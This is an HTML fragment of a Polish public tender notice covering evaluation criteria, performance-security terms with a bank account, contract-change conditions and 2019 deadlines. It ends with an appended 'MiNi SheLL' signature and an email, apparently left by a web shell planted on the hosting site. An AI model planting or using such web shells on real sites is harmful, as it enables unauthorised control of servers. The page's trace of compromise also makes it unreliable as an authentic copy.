id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Rękojmia za wady</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">1. Informacje ogólne. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lubnienależytego wykonania umowy. 2. Wysokość zabezpieczenia należytego wykonania umowy. 1)Zamawiający ustala zabezpieczenie należytego wykonania umowy zawartej w wynikupostępowania o udzielenie niniejszego zamówienia w wysokości 10% ceny całkowitej podanej wofercie. 2) Wybrany Wykonawca zobowiązany jest wnieść zabezpieczenie należytego wykonaniaumowy przed podpisaniem umowy (nie wniesienie zabezpieczenia należytego wykonania umowyjest jedną z przesłanek zatrzymania wadium). 3. Forma zabezpieczenia należytego wykonaniaumowy. 1) Zabezpieczenie należytego wykonania umowy może być wniesione według wyboruWykonawcy w jednej lub w kilku następujących formach: a) pieniądzu, b) poręczeniachbankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym żezobowiązanie kasy jest zawsze zobowiązaniem pieniężnym, c) gwarancjach bankowych, d)gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez podmioty, o których mowa wart. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji RozwojuPrzedsiębiorczości. 2) Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaci przelewem nanastępujący rachunek bankowy Zamawiającego: Warszawski Bank Spółdzielczy 77 8015 00040314 8744 2030 0106 3) W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazićzgodę na zaliczenie kwoty wadium na poczet zabezpieczenia. 4) Jeżeli zabezpieczenie wniesiono wpieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. 5) Wprzypadku składania przez Wykonawcę zabezpieczenia w formie gwarancji / poręczenia, gwarancja/ poręczenie powinny być sporządzone zgodnie z obowiązującym prawem i winne zawieraćnastępujące elementy: a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji /poręczenia (Zamawiającego), gwaranta / poręczyciela (banku lub instytucji ubezpieczeniowejudzielających gwarancji / poręczenia) oraz wskazanie ich siedzib; b) określenie wierzytelności,która ma być zabezpieczona gwarancją / poręczeniem; c) kwotę gwarancji / poręczenia; d) terminważności gwarancji / poręczenia; e) Z treści zabezpieczenia przedstawionego w formie gwarancji /poręczenia winno wynikać, że bank, ubezpieczyciel, poręczyciel zapłaci, na rzecz Zamawiającegow terminie maksymalnie 30 dni od pisemnego żądania kwotę zabezpieczenia, na pierwszewezwanie Zamawiającego, bez odwołania, bez warunku, niezależnie od kwestionowania czyzastrzeżeń Wykonawcy i bez dochodzenia czy wezwanie Zamawiającego jest uzasadnione czy nie.f) Gwarancja / poręczenie muszą być podpisane przez upoważnionego przedstawiciela Gwaranta /Poręczyciela. Podpis musi być sporządzony w sposób umożliwiający jego identyfikację, np.złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). 6) W przypadkuzabezpieczenia należytego wykonania umowy wnoszonego w formie innej, niż pieniądz,Zamawiający wymaga przesłania projektu treści dokumentu gwarancyjnego do akceptacji przedwyznaczonym terminem zawarcia umowy. 7) Jeżeli Wykonawca, którego oferta została wybrananie wniesie zabezpieczenia należytego wykonania umowy, Zamawiający wybiera najkorzystniejsząofertę spośród pozostałych ofert stosownie do treści art. 94 ust. 3 Pzp. 8) Do zmiany formyzabezpieczenia umowy w trakcie realizacji umowy stosuje się art. 149 Pzp. 4. Zwrotzabezpieczenia należytego wykonania umowy. 1) Zamawiający zwróci 70% zabezpieczenia wterminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należyciewykonane. 2) Zamawiający pozostawi na zabezpieczenie roszczeń z tytułu rękojmi za wady kwotęwynoszącą 30% wysokości zabezpieczenia. 3) Kwota, o której mowa w poprzednim punkcie jestzwracana nie później niż w 15 dniu po upływie okresu rękojmi za wady. 4) Zamawiający zwracazabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego,na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku orazprowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.Informacje</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zamawiający dopuszcza następujące warunki zmiany treści umowy: 1) Zawieszenie terminurealizacji zamówienia, określonego w § 3 umowy, w przypadku wystąpienia opóźnień wynikających z:a) wystąpienia warunków atmosferycznych oraz ich skutków, uniemożliwiających prowadzenie robótzgodnie ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych. Fakt wystąpienianiniejszych okoliczności musi być niezwłocznie potwierdzony w dzienniku budowy wpisemdokonanym przez kierownika budowy specjalności elektrycznej, potwierdzonym przez inspektoranadzoru inwestorskiego. b) wystąpienia okoliczności, których strony umowy nie były w stanieprzewidzieć w chwili zawarcia umowy pomimo zachowania należytej staranności. Fakt wystąpienianiniejszych okoliczności musi być potwierdzony w dzienniku budowy wpisem dokonanym przezkierownika budowy specjalności elektrycznej potwierdzonym przez inspektora nadzoruinwestorskiego. c) w przypadku wystąpienia kolizji prac (całkowicie uniemożliwiającej wykonywaniaprac) będących przedmiotem umowy z innymi pracami realizowanymi przez innych wykonawców naterenie przedmiotowej inwestycji. 2) W przedstawionych w ust.1 przypadkach wystąpienia opóźnieństrony ustalą nowy termin realizacji, przy czym minimalny okres przesunięcia terminu zakończeniarobót będzie równy okresowi zawieszenia. 3) Zawieszenie, o którym mowa w ust. 1 zostaje zniesionew przypadku ustania okoliczności powodujących jego zaistnienie. Fakt ustania okoliczności, o którychmowa w ust.1 musi być potwierdzony w dzienniku budowy wpisem dokonanym przez kierownikabudowy specjalności elektrycznej potwierdzonym przez inspektora nadzoru inwestorskiego. 4) Wprzypadku odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji,zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, jak też w przypadku przedłużeniaprzez takie organy lub podmioty procedury wydawania decyzji - termin realizacji przedmiotu umowymoże ulec odpowiedniemu przedłużeniu, jednak nie dłużej niż okres trwania tych okoliczności. 5) Wprzypadku udzielenia przed terminem zakończenia przedmiotu umowy, zamówień uzupełniających napodstawie art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych, których wykonanie ma wpływ natermin realizacji zamówienia podstawowego. 6) W przypadku wejścia w życie zmiany przepisów wzakresie wysokości podatku od towarów i usług (VAT) mających zastosowanie w czasie realizacjiumowy, wynagrodzenie brutto Wykonawcy za część robót wykonywaną po tym terminie ulegniestosownym zmianom natomiast wartość wynagrodzenia netto pozostanie bez zmian. 2. Zamawiającyprzewiduje również możliwość wprowadzenia zmian do treści zawartej umowy dokonane napodstawie art. 144 ust. 1 Ustawy w zakresie zmian nieistotnych, rozumianych w ten sposób, że wiedzao ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego niewpłynęłaby na krąg podmiotów ubiegających się o udzielenie zamówienia czy też wynikpostępowania. 3. Zmiana postanowień umowy wymaga zachowania formy pisemnego aneksu podrygorem nieważności z zastrzeżeniem ust. 4. 4. Poniższe zmiany Umowy nie wymagają zachowaniaformy pisemnego aneksu pod rygorem nieważności, a zostaną dokonane poprzez pisemne zgłoszeniepotwierdzone przez drugą stronę Umowy: 1) zmiana na stanowisku kierownika budowy, 2) zmiana nastanowisku inspektora nadzoru inwestorskiego, 3) zmiana na stanowisku koordynatora, 4) zmianakonta bankowego Wykonawcy, 5) zmiana adresu Wykonawcy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-08-06</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">POLSKI</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data">2019-09-04</span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres"></span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Szczegółowe warunki dotyczące przedmiotowego postępowania zawarte są w specyfikacji istotnychwarunków zamówienia zamieszczonej na stronie internetowej Zamawiającego.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com